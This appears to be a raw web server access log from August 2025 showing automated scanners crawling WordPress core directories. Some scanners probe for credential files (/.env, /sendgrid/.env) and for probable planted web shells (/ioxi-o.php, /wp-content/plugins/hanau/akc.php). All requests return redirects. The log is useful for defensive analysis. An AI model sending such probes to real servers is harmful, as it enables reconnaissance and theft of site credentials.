20.244.42.76 - - [11/Aug/2025:18:16:55 +0300] "GET /wp-includes/class-wp-navigation-fallback.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:17:30 +0300] "GET /wp-includes/class-wp-script-modules.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:17:57 +0300] "GET /wp-includes/class-wp-styles.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:18:08 +0300] "GET /wp-includes/class-wp-textdomain-registry.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:18:21 +0300] "GET /wp-includes/class-wp-theme-json-data.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:18:40 +0300] "GET /wp-includes/class-wp-theme-json-resolver.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:18:50 +0300] "GET /wp-includes/class-wp-theme-json-schema.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:19:27 +0300] "GET /wp-includes/class-wp-token-map.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:19:38 +0300] "GET /wp-includes/class-wp-url-pattern-prefixer.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:19:58 +0300] "GET /wp-includes/class-wpdb.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:20:26 +0300] "GET /wp-includes/global-styles-and-settings.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:20:38 +0300] "GET /wp-includes/https-detection.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:20:56 +0300] "GET /wp-includes/https-migration.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:21:16 +0300] "GET /wp-includes/robots-template.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:21:26 +0300] "GET /wp-includes/script-modules.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:21:54 +0300] "GET /wp-includes/style-engine.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:23:12 +0300] "GET /wp-includes/ID3/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:17:05 +0300] "GET /wp-includes/class-wp-phpmailer.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:17:17 +0300] "GET /wp-includes/class-wp-plugin-dependencies.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:17:41 +0300] "GET /wp-includes/class-wp-scripts.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:17:48 +0300] "GET /wp-includes/class-wp-speculation-rules.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:19:14 +0300] "GET /wp-includes/class-wp-theme-json.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:20:13 +0300] "GET /wp-includes/fonts.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:21:43 +0300] "GET /wp-includes/speculative-loading.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:22:14 +0300] "GET /wp-includes/template-canvas.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:22:25 +0300] "GET /wp-includes/theme-previews.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:22:49 +0300] "GET /wp-includes/theme-templates.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:23:02 +0300] "GET /wp-includes/ID3/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:23:34 +0300] "GET /wp-includes/PHPMailer/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:24:24 +0300] "GET /wp-includes/Text/Diff/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:25:25 +0300] "GET /wp-includes/blocks/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:26:30 +0300] "GET /wp-includes/widgets/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:26:52 +0300] "GET /wp-includes/widgets/class-wp-widget-block.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:27:30 +0300] "GET /wp-includes/fonts/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:23:23 +0300] "GET /wp-includes/IXR/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:23:46 +0300] "GET /wp-includes/PHPMailer/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:23:59 +0300] "GET /wp-includes/Text/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:24:09 +0300] "GET /wp-includes/Text/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:24:17 +0300] "GET /wp-includes/Text/Diff/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:24:31 +0300] "GET /wp-includes/Text/Diff/Engine/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:24:48 +0300] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:25:13 +0300] "GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:25:37 +0300] "GET /wp-includes/pomo/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:25:47 +0300] "GET /wp-includes/pomo/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:25:58 +0300] "GET /wp-includes/sitemaps/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:26:07 +0300] "GET /wp-includes/sitemaps/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:26:20 +0300] "GET /wp-includes/sitemaps/providers/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:26:41 +0300] "GET /wp-includes/widgets/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:27:13 +0300] "GET /wp-includes/css/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:27:21 +0300] "GET /wp-includes/css/dist/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:27:39 +0300] "GET /wp-includes/fonts/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:28:00 +0300] "GET /wp-includes/fonts/class-wp-font-face-resolver.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:28:13 +0300] "GET /wp-includes/fonts/class-wp-font-face.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:28:28 +0300] "GET /wp-includes/fonts/class-wp-font-utils.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:28:47 +0300] "GET /wp-includes/images/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:29:08 +0300] "GET /wp-includes/images/media/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:29:16 +0300] "GET /wp-includes/images/smilies/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:29:45 +0300] "GET /wp-includes/js/%20 HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:30:07 +0300] "GET /wp-includes/js/plupload/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:30:15 +0300] "GET /.well-known/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.82.240.139 - - [11/Aug/2025:19:23:09 +0300] "POST / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.82.240.139 - - [11/Aug/2025:19:23:09 +0300] "GET /sendgrid/.env HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
91.223.3.146 - - [11/Aug/2025:19:38:28 +0300] "GET / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
20.244.26.188 - - [11/Aug/2025:20:28:18 +0300] "GET /ioxi-o.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.244.26.188 - - [11/Aug/2025:20:28:33 +0300] "GET /file17.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.244.26.188 - - [11/Aug/2025:20:28:45 +0300] "GET /file.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.244.26.188 - - [11/Aug/2025:20:29:14 +0300] "GET /wp-content/plugins/hanau/akc.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.244.26.188 - - [11/Aug/2025:20:29:41 +0300] "GET /wp-content/plugins/geu/geu.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.244.26.188 - - [11/Aug/2025:20:30:34 +0300] "GET /wp-content/plugins/view-ad/ms.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:27:49 +0300] "GET /wp-includes/fonts/class-wp-font-collection.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:28:21 +0300] "GET /wp-includes/fonts/class-wp-font-library.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:28:57 +0300] "GET /wp-includes/images/crystal/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:29:24 +0300] "GET /wp-includes/images/wlw/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
20.244.42.76 - - [11/Aug/2025:18:30:00 +0300] "GET /wp-includes/js/codemirror/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
103.82.240.139 - - [11/Aug/2025:19:23:09 +0300] "GET /.env HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.82.240.139 - - [11/Aug/2025:19:23:10 +0300] "POST / HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.82.240.139 - - [11/Aug/2025:19:23:10 +0300] "GET /.env HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.244.26.188 - - [11/Aug/2025:20:29:05 +0300] "GET /wp-content/akp.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.244.26.188 - - [11/Aug/2025:20:29:27 +0300] "GET /aw.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
20.244.26.188 - - [11/Aug/2025:20:30:08 +0300] "GET /wp-content/plugins/deu/ms.php HTTP/1.1" 301 795 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:00:12 +0300] "GET /wp-content/uploads/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:00:27 +0300] "GET /wp-content/upgrade/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:01:49 +0300] "GET /wp-admin/css/colors/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:02:09 +0300] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:02:23 +0300] "GET /wp-admin/css/colors/coffee/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:03:27 +0300] "GET /wp-admin/css/colors/modern/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:05:07 +0300] "GET /wp-includes/ HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:05:34 +0300] "GET /wp-includes/block-bindings.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:06:00 +0300] "GET /wp-includes/block-template-utils.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:06:13 +0300] "GET /wp-includes/block-template.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:06:31 +0300] "GET /wp-includes/class-avif-info.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:07:14 +0300] "GET /wp-includes/class-wp-block-editor-context.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:07:27 +0300] "GET /wp-includes/class-wp-block-metadata-registry.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:07:43 +0300] "GET /wp-includes/class-wp-block-parser-block.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:08:39 +0300] "GET /wp-includes/class-wp-classic-to-block-menu-converter.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
185.241.208.231 - - [11/Aug/2025:21:08:42 +0300] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:09:09 +0300] "GET /wp-includes/class-wp-duotone.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:10:16 +0300] "GET /wp-includes/class-wp-plugin-dependencies.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:10:26 +0300] "GET /wp-includes/class-wp-script-modules.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:10:38 +0300] "GET /wp-includes/class-wp-scripts.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:11:30 +0300] "GET /wp-includes/class-wp-theme-json-data.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:12:05 +0300] "GET /wp-includes/class-wp-theme-json-schema.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.65.155.99 - - [11/Aug/2025:21:12:15 +0300] "GET /wp-includes/class-wp-theme-json.php HTTP/1.1" 301 795 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
